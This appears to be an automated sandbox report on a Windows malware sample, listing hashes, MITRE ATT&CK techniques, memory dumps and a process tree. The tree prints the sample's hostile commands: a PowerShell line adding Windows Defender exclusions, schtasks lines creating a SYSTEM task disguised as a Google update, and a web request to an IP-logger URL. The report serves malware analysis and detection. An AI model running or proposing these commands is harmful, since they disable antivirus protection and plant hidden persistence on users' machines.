a0fed10511c4dc1c252c8cefaf123842871e0610d469f3155f60dfa2892e31c7

General

Target

5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
Size

10.2MB
MD5

d21a17b082c180ab291d60acd6472c08
SHA1

221a714c7ea143399c9dad504b12b29be2f62bc9
SHA256

5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6
SHA512

92c458492154aa35c5e03f313e59c4b0ebe5eb8a71643ca74e0b20d48a4a74ca1806599cfd2c096c74c3022885ead8e7ec1caf13852fea400b85d615c2639448
SSDEEP

196608:/H4wkCR3Peo3+hwP4Ff8Qg+rho+hs8sZbLV2dfN+zvidCGVgaYXMB0lvbWDjpqHi:/4wkCd3+hDEQLbs8ybLu4Did5gaYXMB1

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 2456 created 1204	2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe	21
PID 2456 created 1204	2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe	21
PID 2456 created 1204	2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe	21
PID 2456 created 1204	2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe	21

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2456-0-0x0000000140000000-0x00000001412EC000-memory.dmp	themida
behavioral1/memory/2456-2-0x0000000140000000-0x00000001412EC000-memory.dmp	themida
behavioral1/memory/2456-3-0x0000000140000000-0x00000001412EC000-memory.dmp	themida
behavioral1/memory/2456-10-0x0000000140000000-0x00000001412EC000-memory.dmp	themida
behavioral1/memory/2456-38-0x0000000140000000-0x00000001412EC000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2836	schtasks.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
2696	powershell.exe
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
2456	5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
980	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	980	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe
  "C:\Users\Admin\AppData\Local\Temp\5bf224d571ac2670c97a3af9a87400805575b728e8c0a32e4f12f2f88d0ff2a6.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2696
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2416
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\bicubkbzonui.xml"
  2⤵
  - Creates scheduled task(s)
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -Uri "https://iplogger.com/ZvWn8"
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

2

T1082

Virtualization/Sandbox Evasion

1

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bicubkbzonui.xml

Filesize
1KB

MD5
546d67a48ff2bf7682cea9fac07b942e

SHA1
a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90

SHA256
eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a

SHA512
10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
34f3f6a42348021853378bb2dd0ad017

SHA1
aad886840a30d22757d0c69d785385bff1c3c535

SHA256
a07cd3528ba577c4649de1fe90fa2548ec6d14af45a8d063c9b121795300ec7d

SHA512
51b226d81cb68962fbfbc8f0982b31f0855ba77c36e8dd62bf6cc4d8c651c54e3ef865c262bcdff07a2c052b4d657ea4448a43984377dd71907caad41e5bc893

Download Submit
memory/980-34-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/980-30-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

Filesize
9.6MB

Download
memory/980-29-0x000000001B120000-0x000000001B402000-memory.dmp

Filesize
2.9MB

Download
memory/980-32-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/980-31-0x0000000002330000-0x0000000002338000-memory.dmp

Filesize
32KB

Download
memory/980-33-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

Filesize
9.6MB

Download
memory/980-35-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/980-37-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

Filesize
9.6MB

Download
memory/980-36-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/2456-5-0x0000000077920000-0x0000000077AC9000-memory.dmp

Filesize
1.7MB

Download
memory/2456-38-0x0000000140000000-0x00000001412EC000-memory.dmp

Filesize
18.9MB

Download
memory/2456-0-0x0000000140000000-0x00000001412EC000-memory.dmp

Filesize
18.9MB

Download
memory/2456-39-0x0000000077920000-0x0000000077AC9000-memory.dmp

Filesize
1.7MB

Download
memory/2456-10-0x0000000140000000-0x00000001412EC000-memory.dmp

Filesize
18.9MB

Download
memory/2456-3-0x0000000140000000-0x00000001412EC000-memory.dmp

Filesize
18.9MB

Download
memory/2456-2-0x0000000140000000-0x00000001412EC000-memory.dmp

Filesize
18.9MB

Download
memory/2456-1-0x0000000077920000-0x0000000077AC9000-memory.dmp

Filesize
1.7MB

Download
memory/2696-12-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2696-19-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-18-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2696-16-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2696-17-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2696-15-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-14-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2696-13-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-11-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads